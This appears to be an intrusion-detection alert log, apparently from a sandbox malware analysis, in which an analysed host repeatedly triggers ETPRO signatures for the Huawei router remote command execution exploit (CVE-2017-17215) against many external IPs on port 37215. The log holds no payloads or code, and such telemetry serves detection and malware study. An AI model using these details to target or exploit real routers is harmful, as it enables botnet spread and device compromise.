                                                        06/13/24-21:32:21.787311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528837215192.168.2.14197.236.253.119
                                                        06/13/24-21:32:52.678678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060037215192.168.2.14197.144.63.88
                                                        06/13/24-21:32:17.672234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049637215192.168.2.14156.24.151.120
                                                        06/13/24-21:32:25.976159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14156.72.20.0
                                                        06/13/24-21:32:58.819832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861237215192.168.2.14197.207.74.187
                                                        06/13/24-21:32:23.836250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323437215192.168.2.1441.253.47.37
                                                        06/13/24-21:32:34.191987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777237215192.168.2.14197.116.144.46
                                                        06/13/24-21:32:44.475108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939637215192.168.2.1441.56.16.116
                                                        06/13/24-21:33:05.013868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581037215192.168.2.14156.9.4.103
                                                        06/13/24-21:32:09.455012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307837215192.168.2.1441.173.8.38
                                                        06/13/24-21:32:28.028492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125637215192.168.2.1441.64.81.242
                                                        06/13/24-21:32:50.611084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921637215192.168.2.14156.183.249.207
                                                        06/13/24-21:32:32.155881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741237215192.168.2.14156.9.89.52
                                                        06/13/24-21:32:46.528092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515437215192.168.2.14197.202.8.230
                                                        06/13/24-21:32:52.656459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614437215192.168.2.14197.247.152.60
                                                        06/13/24-21:32:17.697298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616437215192.168.2.14156.119.226.78
                                                        06/13/24-21:33:02.913347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198437215192.168.2.14197.207.34.195
                                                        06/13/24-21:32:01.220203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058837215192.168.2.14197.221.212.245
                                                        06/13/24-21:32:32.170623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476237215192.168.2.14156.132.7.182
                                                        06/13/24-21:32:30.077974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961437215192.168.2.14156.59.223.235
                                                        06/13/24-21:32:05.348865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028837215192.168.2.1441.77.182.65
                                                        06/13/24-21:33:11.176031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14156.91.12.82
                                                        06/13/24-21:32:15.631872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505037215192.168.2.14197.183.126.179
                                                        06/13/24-21:32:34.212474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807237215192.168.2.14197.51.202.245
                                                        06/13/24-21:32:58.839728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277237215192.168.2.1441.6.118.191
                                                        06/13/24-21:32:30.096196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598237215192.168.2.14197.229.235.115
                                                        06/13/24-21:33:13.210672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511037215192.168.2.14156.118.108.81
                                                        06/13/24-21:33:11.159295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292437215192.168.2.1441.167.210.163
                                                        06/13/24-21:32:25.991652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360637215192.168.2.1441.245.227.225
                                                        06/13/24-21:33:07.054887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.14197.98.246.236
                                                        06/13/24-21:32:46.528436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616437215192.168.2.1441.185.20.205
                                                        06/13/24-21:32:36.244247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778837215192.168.2.14197.190.13.57
                                                        06/13/24-21:32:19.750757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709637215192.168.2.1441.95.255.23
                                                        06/13/24-21:32:01.241102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880837215192.168.2.14156.207.230.38
                                                        06/13/24-21:32:13.564576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828437215192.168.2.14197.2.160.31
                                                        06/13/24-21:32:32.153291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692637215192.168.2.14156.13.42.148
                                                        06/13/24-21:32:36.262409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820037215192.168.2.14156.58.43.158
                                                        06/13/24-21:32:38.321025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587637215192.168.2.1441.27.144.110
                                                        06/13/24-21:33:02.909618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929837215192.168.2.1441.161.209.38
                                                        06/13/24-21:32:23.832882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056037215192.168.2.14197.249.122.40
                                                        06/13/24-21:33:02.913889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789037215192.168.2.14197.44.136.29
                                                        06/13/24-21:32:40.374846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931837215192.168.2.14197.249.188.89
                                                        06/13/24-21:32:17.673899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743637215192.168.2.14156.58.165.172
                                                        06/13/24-21:32:36.248271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455037215192.168.2.14156.234.7.144
                                                        06/13/24-21:32:32.169892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019237215192.168.2.1441.47.95.102
                                                        06/13/24-21:32:42.419686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059437215192.168.2.14197.125.215.120
                                                        06/13/24-21:32:09.440722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.14197.49.121.47
                                                        06/13/24-21:32:30.125335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814237215192.168.2.14197.16.85.186
                                                        06/13/24-21:32:11.484452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437637215192.168.2.14197.224.208.178
                                                        06/13/24-21:32:11.485522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801237215192.168.2.1441.156.212.214
                                                        06/13/24-21:32:40.359254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084637215192.168.2.14197.201.22.33
                                                        06/13/24-21:32:03.300386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039037215192.168.2.14197.31.171.82
                                                        06/13/24-21:32:30.099639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889437215192.168.2.14197.37.100.138
                                                        06/13/24-21:33:11.180479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877237215192.168.2.1441.33.247.231
                                                        06/13/24-21:32:28.044921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378237215192.168.2.14197.97.142.130
                                                        06/13/24-21:33:15.258608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718637215192.168.2.1441.252.116.203
                                                        06/13/24-21:32:50.632458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981637215192.168.2.14156.139.221.28
                                                        06/13/24-21:33:00.889556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141637215192.168.2.14197.244.39.114
                                                        06/13/24-21:33:15.252832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568637215192.168.2.1441.76.203.99
                                                        06/13/24-21:32:44.458099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090837215192.168.2.1441.57.185.26
                                                        06/13/24-21:32:21.805664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025037215192.168.2.1441.57.163.69
                                                        06/13/24-21:32:34.193999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4020437215192.168.2.1441.118.160.45
                                                        06/13/24-21:32:58.821453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742837215192.168.2.14156.163.170.114
                                                        06/13/24-21:32:15.605755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579637215192.168.2.1441.36.137.165
                                                        06/13/24-21:32:23.836020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.1441.254.213.204
                                                        06/13/24-21:32:44.476058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979037215192.168.2.14156.71.230.141
                                                        06/13/24-21:33:09.086247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055637215192.168.2.14197.112.142.96
                                                        06/13/24-21:32:44.452525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262037215192.168.2.14156.143.57.157
                                                        06/13/24-21:32:03.277333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318637215192.168.2.14156.135.255.113
                                                        06/13/24-21:32:50.629754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450637215192.168.2.14197.72.188.108
                                                        06/13/24-21:32:56.756699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567637215192.168.2.1441.64.57.105
                                                        06/13/24-21:32:03.295467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634637215192.168.2.14156.149.195.24
                                                        06/13/24-21:32:38.303695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223237215192.168.2.14197.218.230.216
                                                        06/13/24-21:32:44.452024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602237215192.168.2.1441.45.62.50
                                                        06/13/24-21:32:40.358063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674837215192.168.2.1441.130.139.203
                                                        06/13/24-21:32:05.350560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5670637215192.168.2.1441.55.231.220
                                                        06/13/24-21:32:19.730901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969037215192.168.2.1441.119.77.8
                                                        06/13/24-21:32:32.155300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481837215192.168.2.1441.90.161.81
                                                        06/13/24-21:32:50.631340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717437215192.168.2.14156.91.160.8
                                                        06/13/24-21:32:30.099910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087637215192.168.2.14156.18.115.228
                                                        06/13/24-21:33:11.174048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956237215192.168.2.14156.210.203.18
                                                        06/13/24-21:32:34.214025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506637215192.168.2.14156.97.161.239
                                                        06/13/24-21:32:05.350147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5399837215192.168.2.1441.182.103.83
                                                        06/13/24-21:33:17.307683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919837215192.168.2.14156.141.229.201
                                                        06/13/24-21:32:11.487399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082837215192.168.2.14156.232.31.53
                                                        06/13/24-21:31:59.176094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223437215192.168.2.14156.163.40.29
                                                        06/13/24-21:32:13.565040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121237215192.168.2.14197.190.156.78
                                                        06/13/24-21:32:52.671147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817437215192.168.2.1441.76.31.58
                                                        06/13/24-21:32:50.613802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567237215192.168.2.1441.88.230.160
                                                        06/13/24-21:33:09.090919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095037215192.168.2.14156.19.170.124
                                                        06/13/24-21:33:09.128231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960237215192.168.2.14156.53.113.166
                                                        06/13/24-21:32:15.635878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124037215192.168.2.14156.251.25.232
                                                        06/13/24-21:33:07.056381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898237215192.168.2.1441.141.62.44
                                                        06/13/24-21:32:23.836499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984437215192.168.2.1441.5.22.175
                                                        06/13/24-21:33:09.129809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938637215192.168.2.14156.244.192.88
                                                        06/13/24-21:32:23.941862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856437215192.168.2.14156.60.166.12
                                                        06/13/24-21:32:23.833441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207037215192.168.2.1441.109.163.80
                                                        06/13/24-21:32:40.359079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859037215192.168.2.14156.68.150.99
                                                        06/13/24-21:32:07.420035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751037215192.168.2.1441.134.6.23
                                                        06/13/24-21:32:50.614170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153237215192.168.2.1441.96.173.84
                                                        06/13/24-21:33:09.089764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945237215192.168.2.14197.129.3.25
                                                        06/13/24-21:31:59.196425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066037215192.168.2.14156.218.4.34
                                                        06/13/24-21:32:13.546356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956037215192.168.2.1441.74.109.71
                                                        06/13/24-21:32:42.407647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647437215192.168.2.1441.72.80.46
                                                        06/13/24-21:33:02.909738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336837215192.168.2.1441.125.92.178
                                                        06/13/24-21:33:11.157714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054637215192.168.2.14156.192.219.220
                                                        06/13/24-21:33:00.867166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493037215192.168.2.14156.133.207.97
                                                        06/13/24-21:32:58.823175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739437215192.168.2.14197.250.60.25
                                                        06/13/24-21:32:23.832726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333237215192.168.2.14197.204.116.212
                                                        06/13/24-21:33:09.086969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566837215192.168.2.14197.98.77.59
                                                        06/13/24-21:32:38.321259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183437215192.168.2.14197.158.180.29
                                                        06/13/24-21:32:11.485677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377437215192.168.2.1441.105.136.152
                                                        06/13/24-21:32:15.636050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434237215192.168.2.14197.249.140.237
                                                        06/13/24-21:33:09.107025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078637215192.168.2.1441.138.42.17
                                                        06/13/24-21:32:11.506177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687437215192.168.2.14156.94.134.18
                                                        06/13/24-21:33:07.055889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051037215192.168.2.1441.216.148.33
                                                        06/13/24-21:33:02.936468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734437215192.168.2.14156.123.250.207
                                                        06/13/24-21:32:15.610768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062437215192.168.2.14197.142.246.213
                                                        06/13/24-21:32:40.358226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827237215192.168.2.14156.35.169.75
                                                        06/13/24-21:32:48.569171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956037215192.168.2.14156.231.102.126
                                                        06/13/24-21:32:11.487487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077637215192.168.2.14197.98.75.3
                                                        06/13/24-21:32:36.267470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930837215192.168.2.14156.80.177.22
                                                        06/13/24-21:32:23.834983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803637215192.168.2.14197.10.127.67
                                                        06/13/24-21:33:09.110232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940037215192.168.2.14156.123.163.144
                                                        06/13/24-21:32:19.754241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999037215192.168.2.1441.199.199.122
                                                        06/13/24-21:31:57.093339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154837215192.168.2.1441.78.181.194
                                                        06/13/24-21:32:11.488548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323037215192.168.2.14156.183.75.88
                                                        06/13/24-21:32:21.785430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897437215192.168.2.1441.87.97.4
                                                        06/13/24-21:32:50.632126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065037215192.168.2.14156.175.106.101
                                                        06/13/24-21:32:03.278861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838037215192.168.2.14197.211.1.204
                                                        06/13/24-21:32:58.822890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257237215192.168.2.14156.79.221.24
                                                        06/13/24-21:32:50.630718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542437215192.168.2.14156.172.139.182
                                                        06/13/24-21:32:21.800360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.14197.221.200.48
                                                        06/13/24-21:32:25.978730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023037215192.168.2.14197.114.88.46
                                                        06/13/24-21:32:30.079848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464637215192.168.2.14197.1.139.84
                                                        06/13/24-21:32:58.841175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513437215192.168.2.14156.144.31.156
                                                        06/13/24-21:31:59.175914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692037215192.168.2.14197.175.159.181
                                                        06/13/24-21:32:23.834308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532637215192.168.2.14197.113.197.55
                                                        06/13/24-21:33:17.304818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789037215192.168.2.14156.242.143.158
                                                        06/13/24-21:32:01.223328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189037215192.168.2.1441.126.31.120
                                                        06/13/24-21:32:28.025275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929837215192.168.2.1441.164.17.239
                                                        06/13/24-21:32:52.660251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382637215192.168.2.1441.175.43.47
                                                        06/13/24-21:32:28.045317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848437215192.168.2.14156.102.252.150
                                                        06/13/24-21:32:23.942771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675637215192.168.2.14156.42.249.202
                                                        06/13/24-21:32:56.784644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517837215192.168.2.14156.65.176.20
                                                        06/13/24-21:32:42.424487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574837215192.168.2.1441.215.69.19
                                                        06/13/24-21:33:05.011634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663837215192.168.2.1441.170.72.188
                                                        06/13/24-21:32:46.502670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726237215192.168.2.14197.209.133.16
                                                        06/13/24-21:33:07.058461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087637215192.168.2.14197.127.154.130
                                                        06/13/24-21:32:32.164767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324837215192.168.2.14197.148.208.232
                                                        06/13/24-21:33:02.911373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671837215192.168.2.14197.77.213.102
                                                        06/13/24-21:32:13.547419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330237215192.168.2.1441.7.126.99
                                                        06/13/24-21:32:54.710044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459837215192.168.2.14197.138.108.223
                                                        06/13/24-21:32:48.554620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025837215192.168.2.14156.158.38.127
                                                        06/13/24-21:32:19.730662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870837215192.168.2.14156.199.163.66
                                                        06/13/24-21:32:42.420213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885637215192.168.2.14156.15.163.89
                                                        06/13/24-21:32:46.502640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593037215192.168.2.1441.82.232.66
                                                        06/13/24-21:32:19.730222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439437215192.168.2.14156.13.200.195
                                                        06/13/24-21:33:15.258888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709437215192.168.2.14156.63.186.132
                                                        06/13/24-21:32:07.401153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375637215192.168.2.14197.33.10.97
                                                        06/13/24-21:32:19.731601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394437215192.168.2.1441.182.237.241
                                                        06/13/24-21:32:17.694439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583837215192.168.2.14156.170.221.197
                                                        06/13/24-21:32:50.631232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886637215192.168.2.14197.31.183.135
                                                        06/13/24-21:31:57.091932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373037215192.168.2.14197.139.243.135
                                                        06/13/24-21:32:19.751998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717837215192.168.2.1441.60.243.144
                                                        06/13/24-21:32:05.348592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.14156.87.96.23
                                                        06/13/24-21:32:42.404007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882637215192.168.2.1441.69.79.9
                                                        06/13/24-21:32:52.658959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327637215192.168.2.14197.107.16.164
                                                        06/13/24-21:32:19.751143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773837215192.168.2.14156.25.151.16
                                                        06/13/24-21:31:57.090431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143637215192.168.2.14156.125.211.30
                                                        06/13/24-21:32:54.710635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775437215192.168.2.14156.211.72.27
                                                        06/13/24-21:32:42.418328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953837215192.168.2.14197.51.123.50
                                                        06/13/24-21:31:57.134340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058637215192.168.2.1441.49.155.193
                                                        06/13/24-21:32:44.479797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915237215192.168.2.14156.245.147.29
                                                        06/13/24-21:33:02.911068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026037215192.168.2.1441.29.10.253
                                                        06/13/24-21:32:17.694592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778637215192.168.2.1441.184.129.107
                                                        06/13/24-21:32:38.305543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357437215192.168.2.1441.117.145.159
                                                        06/13/24-21:32:07.416877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263637215192.168.2.14197.241.97.3
                                                        06/13/24-21:32:30.076183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14197.73.0.4
                                                        06/13/24-21:32:28.028827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857037215192.168.2.14156.11.240.240
                                                        06/13/24-21:32:28.045248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435237215192.168.2.1441.93.139.187
                                                        06/13/24-21:33:09.106206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322237215192.168.2.14156.52.218.14
                                                        06/13/24-21:32:30.074782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679637215192.168.2.14156.226.22.150
                                                        06/13/24-21:32:54.711863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931637215192.168.2.14156.98.12.67
                                                        06/13/24-21:32:32.170852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766837215192.168.2.14197.49.5.126
                                                        06/13/24-21:32:32.168575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137637215192.168.2.14197.90.59.131
